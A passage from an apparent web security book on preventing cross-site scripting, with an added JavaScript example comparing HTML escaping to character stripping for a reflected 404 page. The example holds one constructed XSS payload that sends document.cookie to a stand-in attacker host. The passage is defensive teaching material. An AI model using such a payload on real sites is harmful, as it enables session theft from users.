The most effective messages nowadays simply send potential victims
a link with no text at all. Their curiosity motivates them to click the link.
Preventing Cross-Site Scripting
To prevent XSS, developers must be very careful with user-supplied data that is served
back to users. We define user-supplied data as any data that reaches a web application
over an outside network connection. It could be a username submitted in an HTML form
at login, a backend AJAX request that was supposed to be issued by the developer's own
JavaScript code, an e-mail, or even HTTP headers. Treat all data entering a
web application from an outside network connection as potentially harmful.
For all user-supplied data that is later redisplayed to users in any HTTP response,
including normal web pages and AJAX responses (HTTP response code 200), page-not-found
errors (HTTP response code 404), server errors (such as HTTP response code 502), redirects
(such as HTTP response code 302), and so on, the developer must do one of the following:
• Escape the data properly so that it is not interpreted as HTML (by browsers) or XML
(by Flash).
• Remove characters or strings that can be used maliciously.
Removing characters generally affects user experience, because legitimate input that
happens to contain those characters is altered, whereas escaping preserves the input
while neutralizing it.
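The two options above, shown side by side in an added example that is not code from the book. It reflects a requested path into a 404 page first verbatim (the XSS bug) and then escaped for an HTML text context, and contrasts escaping with the lossy character-removal approach on benign input. The function names, the attacker path and the benign text are all constructed for the illustration.

```javascript
// Added example (not from the book). Two ways to make reflected user data safe
// for an HTML text context: escape it (preferred) or strip the dangerous
// characters (lossy). Function names and the sample inputs are constructed.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// Escape every character that can start or close HTML markup. Because quotes
// are escaped too, the result is also safe inside a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Lossy alternative: drop the characters instead of encoding them.
function stripMarkupChars(value) {
  return String(value).replace(/[<>"'&]/g, '');
}

// Vulnerable: the requested path is reflected verbatim into the 404 body.
function notFoundPageVulnerable(requestPath) {
  return `<html><body><h1>404</h1><p>${requestPath} was not found.</p></body></html>`;
}

// Fixed: identical template, but the user data is escaped before interpolation.
function notFoundPageFixed(requestPath) {
  return `<html><body><h1>404</h1><p>${escapeHtml(requestPath)} was not found.</p></body></html>`;
}

// Check: a <script> start tag anywhere in the body must have come from user data,
// since the template itself contains none.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker input: the path carried by a link such as a phishing message would send.
const ATTACK_PATH = '/missing"><script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>';
// Constructed benign input that happens to contain markup characters.
const BENIGN_TEXT = 'I <3 C&A';

function demo() {
  return {
    vulnerableEchoesScript: containsScriptTag(notFoundPageVulnerable(ATTACK_PATH)), // true
    fixedEchoesScript: containsScriptTag(notFoundPageFixed(ATTACK_PATH)),           // false
    escapedBenign: escapeHtml(BENIGN_TEXT),        // 'I &lt;3 C&amp;A', rendered as "I <3 C&A"
    strippedBenign: stripMarkupChars(BENIGN_TEXT), // 'I 3 CA', the user's text is mangled
  };
}

console.log(demo());
```

The escaped 404 body still shows the attacker's path to the user, but as literal text; the stripped benign string shows why removal is the worse trade-off for ordinary input. Note that this escaping is correct for HTML text and quoted attribute values only; data placed inside a JavaScript block, a URL, or CSS needs the encoding appropriate to that context.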